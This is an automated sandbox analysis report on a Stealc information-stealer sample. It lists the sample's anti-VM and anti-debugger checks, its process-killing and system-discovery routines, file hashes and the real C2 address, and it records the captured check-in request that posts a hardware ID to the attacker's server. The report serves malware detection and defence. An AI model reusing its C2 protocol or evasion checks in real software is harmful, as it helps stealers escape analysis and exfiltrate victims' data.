Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D616B9 | lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D616A0 | lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D81BF0 | lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1831342123.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1831342123.0000000000C24000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25664
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25536
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25673
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25518
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25685
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25561
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D64A60 | VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D86390 | GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D86390 | mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D82AD0 | GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D846A0 | CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D84610 | CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: L{[Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D82D60 | GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D82B60 | GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D82A40 | GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D82C10 | GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.1771648767.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.1771648767.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (techniques that matched carry the number of triggering signatures in parentheses; the other entries are the matrix template's default technique names):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Native API (13), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: Create Account (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Antivirus, machine learning and genetic malware detection

Initial sample (Source | Detection | Scanner | Label):
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
Dropped files, unpacked PE files, domains: no antivirus matches
URLs (Source | Detection | Scanner | Label):
http://185.215.113.206b | 0% | Avira URL Cloud | safe

No contacted domains info

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high

URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
http://185.215.113.206b | file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/K | file.exe, 00000000.00000002.1831342123.0000000000C40000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/ws | file.exe, 00000000.00000002.1831342123.0000000000C37000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561500
Start date and time: 2024-11-23 15:36:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 19
• Number of non-executed functions: 123
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Timeline (Time | Type | Description):
14:36:58 | Task Scheduler | Run new task: {D77F0804-8B14-41AB-B70B-92F398816110} path:
IP context (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
Domain context: no context
ASN context (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Cryptbot | 185.215.113.43
No further context
                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.943329851472194
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'840'128 bytes
MD5: 4cc6d797a10ba2b6f877fc893f459f67
SHA1: a0c6551d531895b1d716a6f2e89da0cd0721f35a
SHA256: 2e9caa8ec6faf2bfcc89a031cc111e60654107d5979a197d1727266dffbc2b1a
SHA512: 989107424e4b86ca8b4e772129314a922d2a9fe2ade885f28ae56bff2fce3d8aa1063917c6cb31dde8ff56e50fd9d77738e18d07173cf1bef32e78c1fe397bde
SSDEEP: 49152:kLZosPz+2mGYY150iW1ZDU/rCLRUYwmWX96nItpOv:0osDmGYEYvDUA2DtpO
TLSH: C98533700EBB615EF71C877CB7EADB0685982C9CA2E5AF5F8D0091CC60A751E53CBA11
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xaa7000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007FB8DCF0C57Ah
                          pslld mm3, qword ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add eax, 0000000Ah
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add al, 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add eax, 0000000Ah
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edx], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [esi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, byte ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          sbb al, byte ptr [00000000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          inc eax
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x249000 | 0x16200 | a82798516d23817454d4bff6563de35b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | 98990617294d0401904e02229ad3175f | False | 0.80078125 | data | 6.0985334217632765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x24c000 | 0x2b2000 | 0x200 | 34ae26145cf5773c788e54958969b332 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
agjwaxpt | 0x4fe000 | 0x1a8000 | 0x1a7600 | 19a098a4c8054381f83b07eb545bcf56 | False | 0.9946596130425155 | data | 7.953344227799623 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qyczlbbe | 0x6a6000 | 0x1000 | 0x400 | 26f63ebf3701c237a4d0b2bf63470e50 | False | 0.755859375 | data | 5.948443161757515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a7000 | 0x3000 | 0x2200 | a1d8b495aa471f11f6083d1cbd3c26d8 | False | 0.04607077205882353 | DOS executable (COM) | 0.4511548750455626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x6a524c | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-23T15:37:13.432950+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 15:37:11.406693935 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 23, 2024 15:37:11.527741909 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 23, 2024 15:37:11.527883053 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 23, 2024 15:37:11.528079033 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 23, 2024 15:37:11.647567034 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 23, 2024 15:37:12.962486982 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 23, 2024 15:37:12.965274096 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 23, 2024 15:37:12.967936039 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 23, 2024 15:37:13.087532997 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 23, 2024 15:37:13.432811022 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 23, 2024 15:37:13.432950020 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 23, 2024 15:37:17.482475996 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                          • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 7488 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 15:37:11.528079033 CET | 90 | OUT | GET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
Nov 23, 2024 15:37:12.962486982 CET | 203 | IN | HTTP/1.1 200 OK
                          Date: Sat, 23 Nov 2024 14:37:12 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
Nov 23, 2024 15:37:12.967936039 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFH
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 46 44 37 30 30 46 45 38 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 2d 2d 0d 0a
                          Data Ascii: ------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="hwid"55FD700FE8543207603164------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="build"mars------BFCGDAAKFHIDBFIDBKFH--
Nov 23, 2024 15:37:13.432811022 CET | 210 | IN | HTTP/1.1 200 OK
                          Date: Sat, 23 Nov 2024 14:37:13 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=
                          Target ID:0
                          Start time:09:37:07
                          Start date:23/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0xd60000
                          File size:1'840'128 bytes
                          MD5 hash:4CC6D797A10BA2B6F877FC893F459F67
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1771648767.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                            Execution Graph

                            Execution Coverage:4.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.3%
                            Total number of Nodes:1361
